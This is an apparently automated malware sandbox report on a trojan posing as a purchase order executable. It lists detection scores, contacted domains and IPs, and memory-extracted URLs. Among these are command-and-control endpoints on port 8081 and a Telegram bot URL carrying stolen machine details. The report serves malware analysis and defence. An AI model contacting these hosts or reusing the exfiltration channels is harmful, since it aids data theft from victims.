            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            z1PurchaseOrder.exe50%ReversingLabsWin32.Trojan.Autoitinject
            z1PurchaseOrder.exe46%VirustotalBrowse
            z1PurchaseOrder.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            reallyfreegeoip.org0%VirustotalBrowse
            api.telegram.org2%VirustotalBrowse
            checkip.dyndns.com0%VirustotalBrowse
            mail.starofseasmarine.com0%VirustotalBrowse
            checkip.dyndns.org0%VirustotalBrowse
            15.164.165.52.in-addr.arpa0%VirustotalBrowse
            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            http://checkip.dyndns.org0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
            https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            http://varders.kozow.com:80810%URL Reputationsafe
            http://aborters.duckdns.org:8081100%URL Reputationmalware
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            http://checkip.dyndns.org/0%URL Reputationsafe
            http://51.38.247.67:8081/_send_.php?L0%URL Reputationsafe
            https://reallyfreegeoip.org/xml/8.46.123.33$0%URL Reputationsafe
            http://anotherarmy.dns.army:8081100%URL Reputationmalware
            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            http://checkip.dyndns.org/q0%URL Reputationsafe
            https://reallyfreegeoip.org0%URL Reputationsafe
            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%URL Reputationsafe
            https://reallyfreegeoip.org/xml/0%URL Reputationsafe
            http://certs.starfieldtech.com/repository/14020%VirustotalBrowse
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
            https://www.office.com/0%VirustotalBrowse
            http://certificates.starfieldtech.com/repository/00%VirustotalBrowse
            http://crl.starfieldtech.com/sfroot-g2.crl0L0%VirustotalBrowse
            https://api.telegram.org/bot3%VirustotalBrowse
            https://api.telegram.org1%VirustotalBrowse
            https://www.office.com/lB0%VirustotalBrowse
            http://ocsp.starfieldtech.com/0;0%VirustotalBrowse
            http://ocsp.starfieldtech.com/080%VirustotalBrowse
            https://certs.starfieldtech.com/repository/00%VirustotalBrowse
            https://api.telegram.org/bot/sendMessage?chat_id=&text=2%VirustotalBrowse
            http://ocsp.starfieldtech.com/0F0%VirustotalBrowse
            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20a1%VirustotalBrowse
            https://chrome.google.com/webstore?hl=en0%VirustotalBrowse
            http://crl.starfieldtech.com/sfroot.crl0L0%VirustotalBrowse
            https://www.office.com/80%VirustotalBrowse
            http://mail.starofseasmarine.com0%VirustotalBrowse
            http://crl.starfieldtech.com/sfig2s1-677.crl0c0%VirustotalBrowse
            http://certificates.starfieldtech.com/repository/sfig2.crt00%VirustotalBrowse
            NameIPActiveMaliciousAntivirus DetectionReputation
            reallyfreegeoip.org
            188.114.97.3
            truetrueunknown
            api.telegram.org
            149.154.167.220
            truetrueunknown
            checkip.dyndns.com
            158.101.44.242
            truefalseunknown
            mail.starofseasmarine.com
            166.62.28.135
            truetrueunknown
            15.164.165.52.in-addr.arpa
            unknown
            unknowntrueunknown
            checkip.dyndns.org
            unknown
            unknowntrueunknown
            NameMaliciousAntivirus DetectionReputation
            https://reallyfreegeoip.org/xml/8.46.123.33false
            • URL Reputation: safe
            unknown
            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2006/10/2024%20/%2022:42:27%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
              unknown
              http://checkip.dyndns.org/false
              • URL Reputation: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://www.office.com/RegSvcs.exe, 00000001.00000002.4136012994.0000000003482000.00000004.00000800.00020000.00000000.sdmpfalseunknown
              https://duckduckgo.com/chrome_newtabRegSvcs.exe, 00000001.00000002.4137501315.00000000045C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.00000000045F6000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://duckduckgo.com/ac/?q=RegSvcs.exe, 00000001.00000002.4137501315.00000000045C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.00000000045F6000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://api.telegram.orgRegSvcs.exe, 00000001.00000002.4136012994.000000000335B000.00000004.00000800.00020000.00000000.sdmpfalseunknown
              https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegSvcs.exe, 00000001.00000002.4137501315.00000000045C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.00000000045F6000.00000004.00000800.00020000.00000000.sdmpfalseunknown
              https://api.telegram.org/botRegSvcs.exe, 00000001.00000002.4136012994.000000000335B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4135278141.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmpfalseunknown
              https://certs.starfieldtech.com/repository/0RegSvcs.exe, 00000001.00000002.4134562794.000000000147B000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4140126193.0000000005C32000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.000000000337F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4140126193.0000000005C98000.00000004.00000020.00020000.00000000.sdmpfalseunknown
              http://certificates.starfieldtech.com/repository/0RegSvcs.exe, 00000001.00000002.4140126193.0000000005C32000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.000000000337F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4140126193.0000000005C98000.00000004.00000020.00020000.00000000.sdmpfalseunknown
              http://certs.starfieldtech.com/repository/1402RegSvcs.exe, 00000001.00000002.4134562794.000000000147B000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4140126193.0000000005C32000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.000000000337F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4140126193.0000000005C98000.00000004.00000020.00020000.00000000.sdmpfalseunknown
              http://crl.starfieldtech.com/sfroot-g2.crl0LRegSvcs.exe, 00000001.00000002.4134562794.000000000147B000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.000000000337F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4140126193.0000000005C98000.00000004.00000020.00020000.00000000.sdmpfalseunknown
              https://www.office.com/lBRegSvcs.exe, 00000001.00000002.4136012994.000000000347D000.00000004.00000800.00020000.00000000.sdmpfalseunknown
              http://ocsp.starfieldtech.com/08RegSvcs.exe, 00000001.00000002.4140126193.0000000005C32000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.000000000337F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4140126193.0000000005C98000.00000004.00000020.00020000.00000000.sdmpfalseunknown
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegSvcs.exe, 00000001.00000002.4137501315.00000000045C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.00000000045F6000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://checkip.dyndns.orgRegSvcs.exe, 00000001.00000002.4136012994.0000000003271000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://ocsp.starfieldtech.com/0;RegSvcs.exe, 00000001.00000002.4134562794.000000000147B000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.000000000337F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4140126193.0000000005C98000.00000004.00000020.00020000.00000000.sdmpfalseunknown
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RegSvcs.exe, 00000001.00000002.4137501315.00000000045C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.00000000045F6000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016RegSvcs.exe, 00000001.00000002.4137501315.0000000004695000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.000000000444D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.000000000429C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.0000000004474000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.000000000337F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.0000000004555000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.00000000043FF000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17RegSvcs.exe, 00000001.00000002.4137501315.0000000004695000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.000000000444D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.000000000429C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.0000000004474000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.000000000337F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.0000000004555000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.00000000043FF000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://api.telegram.org/bot/sendMessage?chat_id=&text=RegSvcs.exe, 00000001.00000002.4136012994.000000000335B000.00000004.00000800.00020000.00000000.sdmpfalseunknown
              https://chrome.google.com/webstore?hl=enRegSvcs.exe, 00000001.00000002.4136012994.0000000003451000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.0000000003482000.00000004.00000800.00020000.00000000.sdmpfalseunknown
              https://www.ecosia.org/newtab/RegSvcs.exe, 00000001.00000002.4137501315.00000000045C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.00000000045F6000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://chrome.google.com/webstore?hl=en8RegSvcs.exe, 00000001.00000002.4136012994.0000000003442000.00000004.00000800.00020000.00000000.sdmpfalse
                unknown
                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20aRegSvcs.exe, 00000001.00000002.4136012994.000000000335B000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                http://varders.kozow.com:8081RegSvcs.exe, 00000001.00000002.4136012994.0000000003271000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4135278141.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://ocsp.starfieldtech.com/0FRegSvcs.exe, 00000001.00000002.4140126193.0000000005C32000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.000000000337F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4140126193.0000000005C98000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                http://aborters.duckdns.org:8081RegSvcs.exe, 00000001.00000002.4136012994.0000000003271000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4135278141.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmptrue
                • URL Reputation: malware
                unknown
                https://ac.ecosia.org/autocomplete?q=RegSvcs.exe, 00000001.00000002.4137501315.00000000045C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.00000000045F6000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://www.office.com/8RegSvcs.exe, 00000001.00000002.4136012994.0000000003473000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                http://51.38.247.67:8081/_send_.php?LRegSvcs.exe, 00000001.00000002.4136012994.000000000337F000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://crl.starfieldtech.com/sfig2s1-677.crl0cRegSvcs.exe, 00000001.00000002.4140126193.0000000005C32000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.000000000337F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4140126193.0000000005C98000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                https://reallyfreegeoip.org/xml/8.46.123.33$RegSvcs.exe, 00000001.00000002.4136012994.00000000032EF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.000000000335B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.0000000003334000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://anotherarmy.dns.army:8081RegSvcs.exe, 00000001.00000002.4136012994.0000000003271000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4135278141.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmptrue
                • URL Reputation: malware
                unknown
                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallRegSvcs.exe, 00000001.00000002.4137501315.0000000004277000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.000000000444F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.00000000043DA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.0000000004530000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.0000000004405000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.000000000464F000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRegSvcs.exe, 00000001.00000002.4137501315.00000000045C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.00000000045F6000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://checkip.dyndns.org/qRegSvcs.exe, 00000001.00000002.4135278141.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://chrome.google.com/webstore?hl=enlBRegSvcs.exe, 00000001.00000002.4136012994.000000000344C000.00000004.00000800.00020000.00000000.sdmpfalse
                  unknown
                  https://reallyfreegeoip.orgRegSvcs.exe, 00000001.00000002.4136012994.00000000032C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.000000000335B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.0000000003334000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://crl.starfieldtech.com/sfroot.crl0LRegSvcs.exe, 00000001.00000002.4140126193.0000000005C32000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.000000000337F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4140126193.0000000005C98000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  http://mail.starofseasmarine.comRegSvcs.exe, 00000001.00000002.4136012994.000000000337F000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesRegSvcs.exe, 00000001.00000002.4137501315.0000000004277000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.000000000444F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.00000000043DA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.0000000004530000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.0000000004405000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.000000000464F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://certificates.starfieldtech.com/repository/sfig2.crt0RegSvcs.exe, 00000001.00000002.4140126193.0000000005C32000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.000000000337F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4140126193.0000000005C98000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000001.00000002.4136012994.0000000003271000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegSvcs.exe, 00000001.00000002.4137501315.00000000045C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.00000000045F6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedRegSvcs.exe, 00000001.00000002.4135278141.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://reallyfreegeoip.org/xml/RegSvcs.exe, 00000001.00000002.4136012994.00000000032C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4135278141.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  149.154.167.220
                  api.telegram.orgUnited Kingdom
                  62041TELEGRAMRUtrue
                  166.62.28.135
                  mail.starofseasmarine.comUnited States
                  26496AS-26496-GO-DADDY-COM-LLCUStrue
                  188.114.97.3
                  reallyfreegeoip.orgEuropean Union
                  13335CLOUDFLARENETUStrue
                  158.101.44.242
                  checkip.dyndns.comUnited States
                  31898ORACLE-BMC-31898USfalse
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1525492
                  Start date and time:2024-10-04 10:31:07 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 8m 31s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:6
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:z1PurchaseOrder.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@3/1@5/4
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 97%
                  • Number of executed functions: 41
                  • Number of non-executed functions: 313
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  TimeTypeDescription
                  04:32:03API Interceptor11981092x Sleep call for process: RegSvcs.exe modified
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  149.154.167.220RFQ__PO_PO 24090041-PDF____PDF.exeGet hashmaliciousAgentTeslaBrowse
                    enigma.tech.exeGet hashmaliciousBlank GrabberBrowse
                      1.cmdGet hashmaliciousUnknownBrowse
                        2.cmdGet hashmaliciousUnknownBrowse
                          KBGC_1200O000000_98756.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            GeriOdemeBildirimi942.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              08(2)_00.exeGet hashmaliciousAgentTeslaBrowse
                                Hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    T3xpD9ZaYu.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      166.62.28.135ekeson and sons.exeGet hashmaliciousFormBookBrowse
                                      • www.astrobalajichennai.com/eo5u/?3flLi=3fixF&WDH4Z=ZNZ/xCb0AByMrT84YN+VaRUJuS/eLDsmfKlk5YP3EjsgSpc8R3rmuTDGRlyYjyOH7itkGMLpMQ==
                                      188.114.97.3https://technopro-bg.com/redirect.php?action=url&goto=mairie-espondeilhan.com&osCsid=m24rb0l158b8m36rktotvg5ti2Get hashmaliciousHTMLPhisherBrowse
                                      • mairie-espondeilhan.com/
                                      QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • filetransfer.io/data-package/758bYd86/download
                                      QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                      • filetransfer.io/data-package/58PSl7si/download
                                      QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                      • filetransfer.io/data-package/58PSl7si/download
                                      payment copy.exeGet hashmaliciousFormBookBrowse
                                      • www.cc101.pro/0r21/
                                      BX7yRz7XqF.lnkGet hashmaliciousPureLog Stealer, zgRATBrowse
                                      • cloud.dellicon.top/1000/500/
                                      jKSjtQ8W7O.lnkGet hashmaliciousPureLog Stealer, zgRATBrowse
                                      • ministryofficedownloadcloudserver.screenpont.xyz/78/CKP/
                                      Shipping Documents_pdf.exeGet hashmaliciousFormBookBrowse
                                      • www.rtprajalojago.live/7vun/
                                      inject.exeGet hashmaliciousRedLine, XmrigBrowse
                                      • joxi.net/4Ak49WQH0GE3Nr.mp3
                                      http://meta.case-page-appeal.eu/community-standard/208273899187123/Get hashmaliciousUnknownBrowse
                                      • meta.case-page-appeal.eu/assets/k9854w4e5136q5a-f2169603.png
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      reallyfreegeoip.orgFt.204815963710.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.97.3
                                      KBGC_1200O000000_98756.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.96.3
                                      Updated New Order.xlsGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.96.3
                                      GeriOdemeBildirimi942.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.96.3
                                      Hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.97.3
                                      hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.96.3
                                      Athnaton_ANP00224_Specification.xlsGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.96.3
                                      dllhost.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.97.3
                                      IEnetbookupdation.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                      • 188.114.96.3
                                      SCANNED COPY.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.96.3
                                      checkip.dyndns.comFt.204815963710.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 132.226.247.73
                                      MT Eagle Asia 1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 158.101.44.242
                                      KBGC_1200O000000_98756.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 158.101.44.242
                                      Updated New Order.xlsGet hashmaliciousSnake KeyloggerBrowse
                                      • 193.122.130.0
                                      GeriOdemeBildirimi942.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 193.122.130.0
                                      Hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 132.226.247.73
                                      hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 193.122.6.168
                                      QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 158.101.44.242
                                      Athnaton_ANP00224_Specification.xlsGet hashmaliciousSnake KeyloggerBrowse
                                      • 132.226.8.169
                                      dllhost.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 132.226.247.73
                                      api.telegram.orgRFQ__PO_PO 24090041-PDF____PDF.exeGet hashmaliciousAgentTeslaBrowse
                                      • 149.154.167.220
                                      enigma.tech.exeGet hashmaliciousBlank GrabberBrowse
                                      • 149.154.167.220
                                      1.cmdGet hashmaliciousUnknownBrowse
                                      • 149.154.167.220
                                      2.cmdGet hashmaliciousUnknownBrowse
                                      • 149.154.167.220
                                      KBGC_1200O000000_98756.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      GeriOdemeBildirimi942.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 149.154.167.220
                                      08(2)_00.exeGet hashmaliciousAgentTeslaBrowse
                                      • 149.154.167.220
